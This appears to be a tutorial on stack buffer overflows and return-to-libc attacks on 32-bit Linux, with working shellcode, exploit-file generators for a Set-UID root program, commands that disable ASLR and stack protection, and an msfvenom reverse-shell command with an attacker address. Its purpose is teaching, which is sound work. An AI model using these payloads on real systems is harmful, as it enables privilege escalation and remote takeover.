# Buffer Overflow and Return2Libc

![title](Layout.png)

## The memory layout of a C program:
* __Text Segment__: read-only executable code.
* __Data Segment__: static/global variables initialized by the programmer.
* __BSS Segment__: uninitialized static/global variables. The segment is filled with zeros when the program is loaded, so these variables start out as zero.
* __Heap__: space for dynamic memory allocation, managed with _malloc_, _calloc_, _realloc_, _free_, etc. The heap grows from bottom to top (from lower memory addresses to higher ones).
* __Stack__: space for local variables inside functions and for data related to function calls. The stack grows from top to bottom (from higher memory addresses to lower ones).
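
As a rough illustration of the list above, the following sketch prints one sample address from each region. The names `initialized_global`, `uninitialized_global` and `print_layout` are made up for this example, and the function-pointer cast to `void *` assumes a POSIX-like platform such as Linux.

```c
#include <stdio.h>
#include <stdlib.h>

int initialized_global = 42;   /* data segment */
int uninitialized_global;      /* BSS segment: zero-filled when the program loads */

/* Print one sample address per region. Returns 0 on success, -1 if malloc fails. */
int print_layout(void)
{
    int local = 0;                            /* stack */
    int *dynamic = malloc(sizeof *dynamic);   /* heap */
    if (dynamic == NULL)
        return -1;

    printf("text  (print_layout)        : %p\n", (void *)print_layout);
    printf("data  (initialized_global)  : %p\n", (void *)&initialized_global);
    printf("bss   (uninitialized_global): %p\n", (void *)&uninitialized_global);
    printf("heap  (malloc result)       : %p\n", (void *)dynamic);
    printf("stack (local variable)      : %p\n", (void *)&local);

    free(dynamic);
    return 0;
}
```

Calling `print_layout()` from `main()` on Linux typically shows the stack address well above the others. The exact values depend on the platform and on whether address randomization is enabled.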


![stackmemory](Stack.png)

```c
void func(int a, int b)
{
    int x,y;
    x = a + b;
    y = a - b; 
}
```
The corresponding assembly code (32-bit x86, AT&T syntax):
```
pushl    %ebp
movl     %esp, %ebp
subl     $16, %esp
movl     12(%ebp), %eax
movl     8(%ebp), %edx
addl     %edx, %eax
movl     %eax, -8(%ebp)
movl     12(%ebp), %eax 
movl     8(%ebp), %edx
movl     %edx, %ecx
subl     %eax, %ecx 
movl     %ecx, %eax 
movl     %eax, -4(%ebp)
movl     %ebp, %esp 
popl     %ebp 
```

## Stack Frame Mechanisms 
Whenever a function is called, a stack frame is allocated for it on the stack. A stack frame contains: 
* Arguments: the values passed into the function.
* Return Address: the address of the instruction to resume at once the function returns.
* Previous Frame Pointer: the caller's frame pointer value, saved so that it can be restored when the function returns.
* Local variables: variables allocated inside the scope of the function; their space is released when the function returns.


The __frame pointer__ is a CPU register that points to a fixed location in the current stack frame, so the address of each argument and local variable can be calculated from this register plus an offset. The frame pointer's value changes at runtime, whereas the offsets are fixed at compile time. 
On x86, __the frame pointer (%ebp) always points to the slot that holds the previous frame pointer__. On a 32-bit architecture, the return address and the previous frame pointer each occupy 4 bytes. The details can be read directly from the assembly instructions above. 

Across function calls, the frame pointer is how each function gets back to its caller's stack frame. On entry to the callee, the caller's frame pointer value is saved in the __previous frame pointer__ field on the stack. When the callee returns, the value in this field is loaded back into the frame pointer register, making it point to the caller's stack frame again. 
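
The offset arithmetic can be sketched in C. The offsets below are read off the assembly listing for `func(int a, int b)` above (`8(%ebp)` and `12(%ebp)` for the arguments, `-8(%ebp)` and `-4(%ebp)` for the locals); the enum names and `slot_address` are hypothetical helpers, not part of any toolchain.

```c
#include <assert.h>
#include <stdint.h>

/* Slots of func(int a, int b) relative to %ebp on 32-bit x86. */
enum frame_offset {
    OFF_LOCAL_X     = -8,   /* x = a + b */
    OFF_LOCAL_Y     = -4,   /* y = a - b */
    OFF_SAVED_EBP   = 0,    /* previous frame pointer */
    OFF_RETURN_ADDR = 4,    /* return address */
    OFF_ARG_A       = 8,    /* first argument */
    OFF_ARG_B       = 12    /* second argument */
};

/* Address of a slot, given the runtime value of the frame pointer. */
uint32_t slot_address(uint32_t ebp, int32_t offset)
{
    assert(offset % 4 == 0);          /* every slot here is a 4-byte word */
    return ebp + (uint32_t)offset;    /* unsigned wrap-around handles negative offsets */
}
```

For a sample frame pointer value such as 0xbffff188, `slot_address(0xbffff188, OFF_RETURN_ADDR)` yields 0xbffff18c and `slot_address(0xbffff188, OFF_LOCAL_X)` yields 0xbffff180: only the register value changes between calls, while the offsets stay the same.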

## Stack Buffer Overflow 
Unlike Java, which detects out-of-bounds buffer accesses at runtime, C and C++ perform no such check. 
The simplest way to overflow a buffer in C is to call a memory-copying function such as _strcpy()_ without checking lengths.

```c
#include <string.h>
void foo(char *str)
{
    char buffer[12];
    strcpy(buffer, str);
}

int main()
{
    char *str = "this is definitely longer than 12";
    foo(str);
    return 1;
}
```

The stack frame layout for the program is as follows: 
![layout](stack2.png)

The buffer is allocated 12 bytes, but the input string is longer than that. On a machine without stack protection, _strcpy()_ keeps writing past the end of the buffer and overwrites the memory above it, including the previous frame pointer and the return address. Once the return address is overwritten, several things can happen:
* The new address may not be mapped to any physical memory, and the program crashes.
* The new address may lie in memory protected by the kernel; an exception is raised and the program crashes.
* The new address may point to data instead of instructions, and the program most likely crashes.
* The new address may point to valid instructions; the program keeps running, but its logic is no longer the intended one.
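
To make the size of the overrun concrete, here is a small sketch that computes how many bytes _strcpy()_ would write past a destination buffer. `overflow_bytes` is a hypothetical helper introduced only for this illustration.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Number of bytes strcpy(dst, src) would write past a dst of dst_size bytes.
 * Returns 0 when the string and its terminating NUL fit. */
size_t overflow_bytes(size_t dst_size, const char *src)
{
    assert(src != NULL);
    size_t needed = strlen(src) + 1;   /* strcpy also copies the terminating NUL */
    return needed > dst_size ? needed - dst_size : 0;
}
```

For the 12-byte buffer and the 33-character string used in the program above, `overflow_bytes(12, "this is definitely longer than 12")` returns 22, which is enough to run over both the previous frame pointer and the return address.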

__Exploitation__ of a buffer overflow starts with overwriting the return address, which sits just above the previous frame pointer. Controlling it leads to __arbitrary code execution__: the function can be made to return to the address of malicious shellcode that the attacker has placed in memory. The shellcode can be injected as part of the same memory copy operation in the C code, as in the following program, which copies the contents of a file into a buffer that is too small. 
```c
#include <stdlib.h>
#include <stdio.h>
#include <string.h>

int foo(char *str) 
{
    char buffer[100];
    strcpy(buffer, str);
    return 1;
}

int main(int argc, char** argv)
{
    char str[400];
    FILE *badfile;
    badfile = fopen("badfile", "r");
    fread(str, sizeof(char), 300, badfile);
    foo(str);
    printf("Returned properly\n");
    return 1;
}

```

The "bad code" can be stored toward the top of the overwritten region (with its offset calculated), and the return address can be overwritten to point to the beginning of the bad code. Both are supplied through the "bad file". This is the most basic form of buffer overflow; real-world examples are much more complicated. 
![badfile](badfile_insert.png)


### Experiments on Ubuntu 16.04 (Local Exploit)
#### Step 1: Disable Address Randomization 
```
sudo sysctl -w kernel.randomize_va_space=0
```
#### Step 2: Compile the Vulnerable Program
The goal is to exploit a buffer overflow vulnerability in a _Set-UID_ root program, which runs with root privilege even when started by a normal user. The commands are:
```
gcc -o stack -z execstack -fno-stack-protector stack.c 
sudo chown root stack
sudo chmod 4755 stack
```

The first command compiles stack.c and at the same time disables two countermeasures against stack overflow:
* -z execstack: makes the stack executable. By default the stack is marked non-executable, which prevents injected malicious code from running. (The return-to-libc attack described later defeats that countermeasure.)
* -fno-stack-protector: disables Stack Guard, the overflow-detecting countermeasure built into gcc. 

#### Step 3: Conducting Exploit:
* The search space for the address of the malicious code is small, since most programs do not have very deep stacks. Moreover, every process has its own virtual address space that is mapped to different physical memory, so different programs can use the same stack addresses without conflict. 
* Without randomization, the stack starts at the same fixed address on every run. We can estimate it by taking the address of a local variable with `&` and printing it in hex. 
```c
printf("address is 0x%x \n", (unsigned int) &x);
```

* Another way to improve the guess is to create many entry points for the injected code. A common technique is the __NOP sled__, as illustrated by the picture:
![nop](NOP.png)

#### Or better, simply finding the exact location
If one can get a copy of the victim program and investigate it (e.g. after getting a reverse shell), one can calculate the address instead of guessing it. Analyze the program using gdb:
```
gcc -z execstack -fno-stack-protector -g -o stack_dbg stack.c
touch badfile
gdb stack_dbg 
(gdb) b foo
(gdb) run 
```
After hitting the breakpoint in the target function foo(), we can print the value of the %ebp register and the address of the buffer: 
```
(gdb) p $ebp     // assume gives 0xbffff188
(gdb) p &buffer   // assume gives 0xbffff11c 
(gdb) p 0xbffff188 - 0xbffff11c
(gdb) quit 
```

The frame pointer holds the address 0xbffff188, so the return address is stored at \$ebp + 4, and the first address we can jump to (the start of the NOP sled in the figure) is \$ebp + 8. From the calculation above, the distance between the start of the buffer and the location %ebp points to is 108 bytes. The return address field therefore starts at offset 108 + 4 = 112, and the first 112 bytes of the buffer are padding. 
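
The same arithmetic as a minimal C sketch, assuming 32-bit x86 where the saved frame pointer occupies 4 bytes. `return_address_offset` is a hypothetical helper name.

```c
#include <assert.h>
#include <stdint.h>

/* Offset, from the start of the buffer, of the 4-byte return-address slot:
 * the distance up to the saved %ebp plus the 4 bytes that the saved %ebp occupies. */
uint32_t return_address_offset(uint32_t ebp, uint32_t buffer_addr)
{
    assert(ebp >= buffer_addr);   /* the buffer sits below the frame pointer */
    return (ebp - buffer_addr) + 4;
}
```

With the sample gdb values above, `return_address_offset(0xbffff188, 0xbffff11c)` gives 112.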

#### Step 4: Constructing the Input File 

* The first 112 bytes of the buffer are padding; for simplicity, they are set to NOP, i.e. \x90. 
* The next 4 bytes (offsets 112 to 115) overwrite the return address. They hold an address inside the NOP sled, which starts at 0xbffff188 + 8. 
* The rest of the buffer is a combination of NOP sled and the malicious shellcode, with the shellcode placed at the end of the buffer. 

The sample code is shown below.

```c
#include <stdlib.h>
#include <stdio.h>
#include <string.h>

char shellcode[] = 
    "\x31\xc0"       // xorl  %eax, %eax 
    "\x50"           // pushl %eax 
    "\x68""//sh"     // pushl $0x68732f2f 
    "\x68""/bin"     // pushl $0x6e69622f 
    "\x89\xe3"       // movl  %esp, %ebx 
    "\x50"           // pushl %eax 
    "\x53"           // pushl %ebx 
    "\x89\xe1"       // movl  %esp, %ecx 
    "\x99"           // cdq 
    "\xb0\x0b"       // movb  $0x0b, %al 
    "\xcd\x80"       // int   $0x80
;


int main(int argc, char **argv) {
    char buffer[200];
    FILE *badfile;
    memset(buffer, 0x90, sizeof(buffer));            // fill the whole buffer with NOPs
    // new return address (assumes a 32-bit build, where long is 4 bytes)
    *((long*) (buffer + 112)) = 0xbffff188 + 0x80; 
    // shellcode (including its terminating NUL) goes at the end of the buffer
    memcpy(buffer + sizeof(buffer) - sizeof(shellcode), shellcode, sizeof(shellcode)); 
    badfile = fopen("./badfile", "w");
    fwrite(buffer, 200, 1, badfile);
    fclose(badfile);
    return 0;
}    

```

The value stored in the return address field is not 0xbffff188 + 8 but 0xbffff188 + 0x80. The frame pointer value observed in gdb can differ from the one during a normal run, because gdb pushes some extra data onto the stack before starting the program; when the program runs directly, the actual frame pointer can be larger. Aiming further into the NOP sled leaves room for this difference. Also, the content of badfile __must not contain bad characters such as 0x00__ ahead of the shellcode: _strcpy()_ stops at the first zero byte, so everything after it would not be copied. This includes the bytes of the address computed as 0xbffff188 + nnn. For example, if nnn = 0x78, the result 0xbffff200 contains a 0x00 byte, and the copy stops there. 
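
A candidate return address can be checked for zero bytes before it is written into the file. The helper below is a small sketch with a made-up name, `has_zero_byte`, and assumes 32-bit addresses.

```c
#include <stdint.h>

/* Returns 1 if any of the four bytes of a 32-bit address is 0x00, else 0. */
int has_zero_byte(uint32_t addr)
{
    for (int i = 0; i < 4; i++) {
        if (((addr >> (8 * i)) & 0xffu) == 0)
            return 1;
    }
    return 0;
}
```

With the values from the text, `has_zero_byte(0xbffff188 + 0x78)` returns 1 (the result is 0xbffff200), while `has_zero_byte(0xbffff188 + 0x80)` returns 0 (the result is 0xbffff208).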

#### Step 5: Run the exploit
If we compile and run the code above to generate badfile and then run the _stack_ executable again, we get a root shell. 

## Writing Shellcode 

The core of getting a shell is the _execve()_ system call, used to execute "/bin/sh". This requires setting four registers: 
* %eax: must contain 11, which is the system call number for execve().
* %ebx: must contain the address of the command string ("/bin/sh"). 
* %ecx: must contain the address of the argument array; in our case, the first element of the array points to the "/bin/sh" string, while the second element is 0 (which marks the end of the array). 
* %edx: must contain the address of the environment variables to pass to the new program. We can set it to zero, since no environment variables are needed. 

To achieve this, we need to know the address of the "/bin/sh" string, and we also have to avoid zero bytes in the code. <br>
A shortcut is to generate the shellcode with the Metasploit Framework's __msfvenom__ tool. 

### Example Shellcode explanation:
```c
    "\x31\xc0"       // xorl  %eax, %eax 
    "\x50"           // pushl %eax 
    "\x68""//sh"     // pushl $0x68732f2f 
    "\x68""/bin"     // pushl $0x6e69622f 
    "\x89\xe3"       // movl  %esp, %ebx 
    "\x50"           // pushl %eax 
    "\x53"           // pushl %ebx 
    "\x89\xe1"       // movl  %esp, %ecx 
    "\x99"           // cdq 
    "\xb0\x0b"       // movb  $0x0b, %al 
    "\xcd\x80"       // int   $0x80

```

#### Step 1: Finding the address of the "/bin/sh" string and setting %ebx 
We first push the string onto the stack. Since only four bytes can be pushed at a time, the string goes in as 4-byte pieces, last piece first (since the stack grows from high to low addresses), preceded by a zero word that terminates it.
* xorl %eax, %eax: XOR-ing the %eax register with itself sets it to zero without introducing any zero bytes in the code.
* pushl %eax: pushes a zero onto the stack. This zero marks the end of the "/bin/sh" string. 
* pushl \$0x68732f2f: pushes "//sh" onto the stack. A double slash is used because exactly 4 bytes are required, and execve() treats a double slash the same as a single slash. 
* pushl \$0x6e69622f: pushes "/bin" onto the stack. Now the whole "/bin//sh" string is on the stack, and %esp points to the beginning of the string. 
* movl %esp, %ebx: copies %esp to %ebx, which saves the string's address in register %ebx. 
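
The two immediates can be derived from the string pieces themselves. The sketch below packs four characters into a little-endian 32-bit value, which is how x86 lays out a pushed word in memory. `push_immediate` is a hypothetical helper name.

```c
#include <stdint.h>

/* Pack exactly four characters into the 32-bit immediate used by pushl.
 * x86 is little-endian, so the first character becomes the lowest byte. */
uint32_t push_immediate(const char four_chars[4])
{
    uint32_t value = 0;
    for (int i = 3; i >= 0; i--)
        value = (value << 8) | (uint8_t)four_chars[i];
    return value;
}
```

`push_immediate("//sh")` yields 0x68732f2f and `push_immediate("/bin")` yields 0x6e69622f, matching the operands of the two pushl instructions.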

#### Step 2: Finding the address of the name[] array and setting %ecx 

The name[] array should contain two elements: the address of "/bin/sh" in name[0] and 0 in name[1]. 
* pushl %eax: constructs the second item of the name array, which is simply zero. 
* pushl %ebx: %ebx contains the address of "/bin/sh". Pushing it completes the name array. 
* movl %esp, %ecx: %esp now points to the beginning of the name array, so we save that address in register %ecx. 

#### Step 3: Setting %edx to zero:
* cdq: copies the sign bit (0) of the value in %eax into every bit position of %edx, setting it to zero. This instruction is only 1 byte long. 
* xorl %edx, %edx: also works, but takes 2 bytes. 

#### Step 4: Invoking the execve() system call
* movb \$0x0b, %al: sets %al (the lower 8 bits of the %eax register) to 11, the system call number of execve(). %eax was zero before, so it now holds exactly 11. 
* int \$0x80: executes the system call. The _int_ instruction raises a software interrupt that switches to kernel mode, and interrupt number 0x80 is the system call entry point on 32-bit Linux. 

## Another way: Kali Demo 

### Remote Buffer Overflow
The attack against a remote service can begin with _fuzzing_: send strings of increasing length to the target port until the service crashes. 
* Use __pattern_create.rb__ in Kali Linux to generate a string of unique chunks and send it.
* If the debugger shows the value of the %eip register at the crash, look that value up with __pattern_offset.rb__ in Kali Linux to find the offset of the return address.
* Observe the value of the %esp register and try to control what it points to. (In the Windows exploit example used here, %esp points directly into the buffer, which makes that location a good place for the shellcode.)
* When generating shellcode with __msfvenom__, exclude the bad characters. 
* Under __address randomization__, the hard-coded stack address used as the return address in the previous section no longer works. The way around it is to reach the shellcode through the %esp register, which points into our buffer at the time of the crash: overwrite the return address with the address of a __reliable, accessible__ memory location that contains the instruction 
  ```
  jmp *%esp 
  ```
  Reliable and accessible means that the location is not subject to memory protections such as DEP and ASLR, and that its address does not contain bad characters. 
* The search for the instruction is done with the __mona.py__ script in Immunity Debugger. 
    * First find the hex encoding of the instruction with __nasm_shell.rb__ in Kali Linux (`jmp esp` in its Intel syntax, which assembles to `\xff\xe4`). 
* For example: `!mona find -s "\xff\xe4" -m slmfc.dll`
* Put the address found by mona.py right after the padding, at the offset that lands in %eip. 
* Follow it with a short NOP sled (e.g. "\x90" * 8).
* Fill the rest of the buffer with shellcode, generated for example with `msfvenom -p windows/shell_reverse_tcp LHOST=10.0.0.4 LPORT=443 -f c -e x86/shikata_ga_nai -b "\x00\x0a\x0d"`
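
The pattern-based offset search from the first steps of this list can be sketched in C. The sketch mimics the `Aa0Aa1Aa2...` style of pattern in which each position is identifiable from a short window; the function names are placeholders for this illustration, not the interface of the Ruby tools. The chunk passed to `pattern_offset` is the four characters as they appear in memory, so a register value read from a debugger has to be converted from little-endian first.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

#define PATTERN_MAX (26 * 26 * 10 * 3)   /* longest pattern before triples repeat */

/* Fill out[0..len-1] with the pattern and NUL-terminate it.
 * The caller must provide at least len + 1 bytes. */
void pattern_create(char *out, size_t len)
{
    assert(len <= PATTERN_MAX);
    for (size_t i = 0; i < len; i++) {
        size_t triple = i / 3;   /* index of the current 3-character group */
        switch (i % 3) {
        case 0:  out[i] = (char)('A' + triple / 260);       break;
        case 1:  out[i] = (char)('a' + (triple / 10) % 26); break;
        default: out[i] = (char)('0' + triple % 10);        break;
        }
    }
    out[len] = '\0';
}

/* Offset of a chunk inside the pattern, or -1 if the chunk does not occur. */
long pattern_offset(const char *pattern, const char *chunk)
{
    const char *hit = strstr(pattern, chunk);
    return hit ? (long)(hit - pattern) : -1;
}
```

A 64-byte pattern starts with `Aa0Aa1Aa2Aa3`, and looking up the chunk `a1Aa` returns offset 4. In an actual crash, the offset found this way is the amount of padding needed before the return address.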

### Stack Guard Bypass 
The first example dealt with the most basic stack overflow, where no countermeasure is implemented in the compiler or the hardware. The way around address randomization was covered in the Kali Linux exploit case. The non-executable stack is dealt with in the __Return-to-libc Attack__ below. This section is dedicated to another mechanism, introduced by the gcc compiler, called __stack guard__. <br>
#### Stack Guard 
This countermeasure builds on two observations: 
* Any stack overflow attack has to modify the return address.
* All the memory between the buffer and the return address is overwritten along the way. 

Therefore, the compiler places an unpredictable value between the buffer and the return address. Before the function returns, it checks whether the value has been modified. If it has, the return address has probably been modified too, and the program is aborted with a _stack smashing detected_ error.
* The reference copy of the __guard__ must not be stored on the stack, or it would be overwritten too.
* It can be stored in the heap, BSS, or data segment (e.g. an uninitialized global variable is stored in the BSS segment). 

The following example shows the idea of stack guard:
```c
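#include <stdlib.h>
#include <string.h>

// uninitialized here; given a random value at runtime by a random number generator
int secret;

void foo(char *str) {
    int guard;
    guard = secret;          // copy the secret onto the stack, above the buffer
    char buffer[12];
    strcpy(buffer, str);
    if (guard == secret)     // guard intact: the overflow did not reach it
        return;
    else 
        exit(1);             // guard overwritten: abort instead of returning
}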

```
gcc has stack guard built in. On distributions such as Ubuntu it is on by default, so it is active unless -fno-stack-protector is passed. We can examine the assembly code of a program to find the stack guard. Sample __canary code__ is: 
```
movl     %gs:20, %eax
movl     %eax, -12(%ebp)
xorl     %eax, %eax 
...
movl     -12(%ebp), %eax 
xorl     %gs:20,  %eax 
je       .L2 
call     __stack_chk_fail 
```
Key properties of the stack canary: 
* it must be a random value
* its reference copy must be stored outside the stack (here it is read from %gs:20) 

#### Bypass 

## The Return-to-libc Attack

This type of attack targets the __non-executable stack__ countermeasure. When injected code cannot be executed, the attack uses code that is already in memory. The best target is the _libc_ library, which is used by almost every program and is loaded into memory by the OS each time. <br>
One example is to call the _system()_ function from libc and pass "/bin/sh" to it. <br>
Using the same vulnerable sample C code, compile it with 
```
gcc -fno-stack-protector -z noexecstack -o stack stack.c
sudo sysctl -w kernel.randomize_va_space=0 
sudo chown root stack
sudo chmod 4755 stack
```
These commands make the program's stack non-executable and turn off address randomization (a way around it was introduced in the previous Kali example). The program is also a Set-UID root program, so exploiting it gives us a root shell.

### Find the address of system(): 
First, debug the program with gdb and, after running it, print the addresses of the loaded libc functions:
```
touch badfile 
gdb stack 
(gdb) run 
(gdb) p system
$1 = {<text variable, no debug info>} 0xb7e5f430 <system>
(gdb) p exit
$2 = {<text variable, no debug info>} 0xb7e52fb0 <exit> 
(gdb) quit
``` 
### Find the address of the "/bin/sh" string:
Previously we used the stack to hold the string. This time we use an environment variable. 
```c
//envaddr.c 
#include <stdio.h>
#include <stdlib.h>
int main() {
    char *shell = getenv("MYSHELL");   // NULL if the variable is not set
    if (shell) {
        printf(" Value: %s\n", shell);
        printf(" Address: %x\n", (unsigned int) shell);   // assumes 32-bit pointers
    }
    return 0; 
}
```
Compile and run it with the following commands: 
```
gcc envaddr.c -o env55
export MYSHELL="/bin/sh"
./env55
```
This works because environment variables are passed to the child processes of the shell (including our vulnerable program) and loaded directly into their virtual memory. The address of an environment variable depends on the length of the program's name, so the helper program and the vulnerable program must have names of the same length. 

### Prepare for the argument:
Before the vulnerable program jumps to the system() function, we need to place the argument on the stack ourselves. To do so, we need to know where the %ebp register will point once system() has been invoked, because system() looks for its argument at %ebp + 8. 
![ebp](ebp.png)

Even without address randomization, we still need to predict where the %ebp register points after the jump into the system() function. To do this, we need to understand the __function prologue__ and the __function epilogue__. 
#### Function Prologue 
In assembly, the function prologue is the code at the beginning of a function that prepares the stack and registers for the function. On IA-32, it normally consists of: 
```
pushl %ebp                // save the caller's frame pointer 
movl  %esp, %ebp          // point the frame pointer at the current top of the stack
subl  $N, %esp            // allocate space for local variables 
```

#### Function Epilogue 
The function epilogue is the code at the end of a function. It restores the stack and registers to the state they were in before the function was invoked. 
```
movl %ebp, %esp       // release the stack space of the local variables 
popl %ebp             // restore the previous frame pointer into %ebp
ret                   // pop the return address and jump to it
```
Note that the return address is 4 bytes above the location the frame pointer points to. x86 also provides the _enter_ and _leave_ instructions for the function prologue and the function epilogue.

Now the meaty part: to find where to place the argument for system(), we inspect the function epilogue of the vulnerable function and the function prologue of system(). To make the vulnerable function return into system() in libc, we trace the %esp register through both. <br>
When the vulnerable function returns, its epilogue releases the stack space and restores %ebp; the _ret_ instruction then pops the return address, leaving %esp 4 bytes above the return address slot. Once the program has jumped into system(), the prologue of system() runs: it pushes %ebp, which moves %esp back down by 4 bytes, and then copies %esp into %ebp. The argument must therefore be placed 8 bytes above this new %ebp (which is 4 bytes above %esp at the moment system() is entered). The slot at %ebp + 4 is treated as the return address of system(), which in our case can hold the address of exit(). 
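
Expressed relative to the start of the overflowed buffer, this gives three consecutive 4-byte slots. The sketch below computes them from the distance between the buffer and the location %ebp points to in the vulnerable function; the struct and function names are hypothetical and the 4-byte slot size assumes 32-bit x86.

```c
#include <stddef.h>

/* Offsets, from the start of the buffer, of the three words that matter. */
struct ret2libc_layout {
    size_t system_addr;   /* overwrites the vulnerable function's return address */
    size_t exit_addr;     /* the return address that system() will see */
    size_t arg_addr;      /* first argument of system(): pointer to "/bin/sh" */
};

/* ebp_offset: distance from the buffer start to the saved frame pointer slot. */
struct ret2libc_layout ret2libc_offsets(size_t ebp_offset)
{
    struct ret2libc_layout layout;
    layout.system_addr = ebp_offset + 4;    /* skip the saved %ebp */
    layout.exit_addr   = ebp_offset + 8;    /* %ebp + 4 inside system() */
    layout.arg_addr    = ebp_offset + 12;   /* %ebp + 8 inside system() */
    return layout;
}
```

For a distance of 58 bytes, the value measured in the next subsection, the slots land at offsets 62, 66 and 70.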

#### The Malicious Input
__Find the offset between the buffer and the location the %ebp register points to__: 
```
gcc -fno-stack-protector -z noexecstack -g -o stack_dbg stack.c
touch badfile 
gdb stack_dbg 
(gdb) b vul_func 
(gdb) run 
(gdb) p &buffer
(gdb) p $ebp 
(gdb) p 0xbffff208 - 0xbffff1ce    // 58 
```
The offset between the start of the buffer and the location %ebp points to is 58 bytes, therefore: 
* the address of the system() function goes at offset 62 
* the address of the exit() function goes at offset 66
* the address of the string "/bin/sh" goes at offset 70

These requirements give us the following C code:
```c
#include <stdio.h>
#include <string.h>
int main(int argc, char** argv) {
    char buf[200];
    FILE *badfile;
    memset(buf, 0xaa, 200); 
    *(long *) &buf[70] = 0xbffffe8c; // address of "/bin/sh" 
    *(long *) &buf[66] = 0xb7e52fb0; // address of exit(), as printed by gdb above 
    *(long *) &buf[62] = 0xb7e5f430; // address of system(), as printed by gdb above 
    badfile = fopen("./badfile", "w");
    fwrite(buf, sizeof(buf), 1, badfile);
    fclose(badfile); 
}
```
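We run the same vulnerable program as before and should get a root shell. This only works if the name of the vulnerable executable has the same length as _env55_, the program we compiled earlier to print the address of the environment variable (_stack_ and _env55_ are both 5 characters long). 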
```
gcc ret_to_libc_exploit.c -o exploit 
./exploit 
./stack
```